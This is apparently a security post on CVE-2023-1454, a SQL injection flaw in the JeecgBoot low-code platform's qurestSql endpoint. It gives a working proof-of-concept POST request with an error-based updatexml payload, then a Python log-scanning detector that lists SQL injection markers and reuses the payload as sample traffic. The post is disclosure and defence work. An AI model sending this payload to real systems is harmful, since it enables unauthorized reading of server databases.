JeecgBoot Enterprise-level low-code platform qurestSql SQL injection vulnerability CVE-2023-1454
Vulnerability Description
The qurestSql interface of the JeecgBoot enterprise-level low-code platform has a SQL injection vulnerability. An attacker can use it to read sensitive data from the server database and then carry the attack further.
Vulnerability Impact
JeecgBoot enterprise-level low-code platform
Network surveying and mapping
Vulnerability reproduction
Login page
Verify with PoC

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Content-Type: application/json

{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
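As an added defensive example (not code from the original post or from the JeecgBoot project), the following Python helper scans captured POST requests to the qurestSql endpoint and flags any whose JSON "id" field is not a plain numeric identifier or carries error-based SQL injection markers such as the updatexml() call in the request above. The request-tuple format, the sample requests and the assumption that legitimate ids are digit-only strings are constructed for this example.

```python
"""Log-scanning detector for injection attempts against /jmreport/qurestSql.

Added example, not JeecgBoot project code. Assumes requests are available
as (method, path, body) tuples and that a legitimate "id" is a digit-only
string (snowflake-style id, as in the apiSelectId value on this page).
"""
import json
import re
from typing import Dict, List, Tuple

TARGET_PATH_SUFFIX = "/jmreport/qurestSql"

# Deny-list of tokens typical of error-based SQL injection (case-insensitive).
INJECTION_MARKERS = re.compile(
    r"'|\"|--|/\*|\b(updatexml|extractvalue|concat|select|union|sleep|benchmark|or|and|like)\b",
    re.IGNORECASE,
)

# Allow-list (assumption for this example): a benign id is digits only.
NUMERIC_ID = re.compile(r"^\d+$")

Request = Tuple[str, str, str]  # (method, path, body) - constructed format


def classify_request(method: str, path: str, body: str) -> Dict[str, object]:
    """Return a verdict for one request; only POSTs to the qurestSql path are inspected."""
    verdict: Dict[str, object] = {"inspected": False, "suspicious": False, "reasons": []}
    reasons: List[str] = verdict["reasons"]  # type: ignore[assignment]
    if method.upper() != "POST" or not path.endswith(TARGET_PATH_SUFFIX):
        return verdict
    verdict["inspected"] = True
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        verdict["suspicious"] = True
        reasons.append("body is not valid JSON")
        return verdict
    if not isinstance(payload, dict):
        verdict["suspicious"] = True
        reasons.append("body is not a JSON object")
        return verdict
    id_value = payload.get("id")
    if not isinstance(id_value, str):
        verdict["suspicious"] = True
        reasons.append(f"id is {type(id_value).__name__}, expected string")
        return verdict
    if NUMERIC_ID.match(id_value):
        return verdict  # allow-list satisfied, nothing to report
    verdict["suspicious"] = True
    reasons.append("id is not a digit-only identifier")
    markers = sorted({m.group(0).lower() for m in INJECTION_MARKERS.finditer(id_value)})
    if markers:
        reasons.append("injection markers: " + ", ".join(markers))
    return verdict


def scan(requests: List[Request]) -> List[Tuple[int, Dict[str, object]]]:
    """Return (index, verdict) for each inspected request judged suspicious."""
    alerts = []
    for i, (method, path, body) in enumerate(requests):
        verdict = classify_request(method, path, body)
        if verdict["suspicious"]:
            alerts.append((i, verdict))
    return alerts


# Constructed sample traffic: one benign call, the PoC body from this page,
# an unrelated endpoint, and a truncated body.
SAMPLE_REQUESTS: List[Request] = [
    ("POST", "/jeecg-boot/jmreport/qurestSql",
     '{"apiSelectId":"1290104038414721025","id":"42"}'),
    ("POST", "/jeecg-boot/jmreport/qurestSql",
     '{"apiSelectId":"1290104038414721025",'
     '"id":"1\' or \'%1%\' like (updatexml(0x3a,concat(1,(select current_user)),1)) or \'%%\' like \'"}'),
    ("GET", "/jeecg-boot/sys/login", ""),
    ("POST", "/jeecg-boot/jmreport/qurestSql", '{"id":'),
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_REQUESTS):
        print(f"request #{index}: {'; '.join(verdict['reasons'])}")
```

The allow-list check does the real work; the marker list only explains the alert. If a deployment uses non-numeric ids, adjust NUMERIC_ID rather than relying on the deny-list alone. The detector is a stop-gap for spotting exploitation attempts in access logs; the durable fix is parameterizing the query on the server side.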
This post is licensed under CC BY 4.0 by the author.